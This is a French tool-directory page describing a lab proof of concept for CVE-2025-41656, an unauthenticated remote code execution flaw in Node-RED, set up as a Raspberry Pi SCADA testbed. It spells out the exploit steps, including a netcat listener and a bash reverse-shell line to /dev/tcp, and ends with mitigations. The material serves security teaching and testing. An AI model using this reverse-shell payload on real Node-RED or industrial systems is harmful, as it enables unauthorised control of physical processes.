Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-41656 — Ce dépôt comprend le code et les fichiers nécessaires pour tester et exécuter un PoC pour CVE-2025-41656 | Kitploit
Outils/GitHubGitHub/wallyschag/cve-2025-41656
Sécurité IoTAnalyse des VulnérabilitésExploitationSécurité SCADA/ICSApprentissage et ÉducationLabs et Pratique
GitHubwallyschag/cve-2025-41656

CVE-2025-41656

Ce dépôt comprend le code et les fichiers nécessaires pour tester et exécuter un PoC pour CVE-2025-41656

Voir le dépôt
24il y a 10 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-41656

Résumé du projet

Ce projet existe pour modéliser CVE-2025-41656, une vulnérabilité d'exécution de code à distance non authentifiée pour NodeRED. Pour modéliser cette vulnérabilité, nous avons créé un système SCADA de petit format avec un Raspberry Pi, un actionneur et un capteur. Le Raspberry Pi contient un conteneur NodeRED et un conteneur OpenPLC qui communiquent entre eux via Modbus TCP pour contrôler l'actionneur. Il s'agit d'un script de preuve de concept en Python pour réaliser l'attaque CVE-2025-41656. L'objectif est de créer avec succès un PoC et de trouver des correctifs pour sécuriser le système.

Pour commencer

Le laboratoire comprendra les éléments suivants

  • Rasberry Pi 3b+
  • Fichier Docker Compose avec les conteneurs NodeRED et OpenPLC
  • Un actionneur
  • Un capteur
  • Un dispositif motorisé contrôlé par l'actionneur
  • Remarque : La configuration sera différente selon le matériel dont vous disposez. Adaptez en conséquence.

Installation du logiciel

root@kitploit:~
git clone [email protected]:wallyschag/CVE-2025-41656.git
cd CVE-2025-41656
git clone https://github.com/thiagoralves/OpenPLC_v3.git

Configuration Docker

root@kitploit:~
rm OpenPLC_v3/Dockerfile && cp Dockerfile_WiringPi OpenPLC_v3/Dockerfile
docker compose up --build -d
  • Vérifiez que les conteneurs Docker et le pont réseau sont opérationnels
root@kitploit:~
docker container ls
docker network inspect csci587-final-project_scadanet
  • Les deux conteneurs Docker doivent être en marche.
  • Assurez-vous également que les deux conteneurs sont connectés au réseau et ont une adresse IP attribuée.

L'exploit

  • Sur la machine hôte, exécutez nc -lvnp 1234
  • Remplacez NODE_RED_IP et NODE_RED_PORT par l'adresse IP et le port (1880) de votre service NodeRED dans cve_2025_41656.py.
  • Dans cve_2025_41656, changez l'adresse IP dans la ligne "command": "bash -c 'bash -i >& /dev/tcp/192.168.4.223/1234 0>&1'", par l'adresse IP de la machine depuis laquelle vous lancez l'exploit.
root@kitploit:~
python3 cve_2025_41656.py
  • Vous devriez maintenant avoir un shell inversé sur le conteneur NodeRED.

Stratégies d'atténuation

  • Mettez en œuvre TLS et un mécanisme d'authentification pour NodeRED.
  • Segmentez les réseaux SCADA pour empêcher tout accès non autorisé à NodeRED.
  • Surveillez les réseaux contenant NodeRED avec des systèmes IDS/IPS à la recherche de trafic de shell inversé.
Télécharger l’outil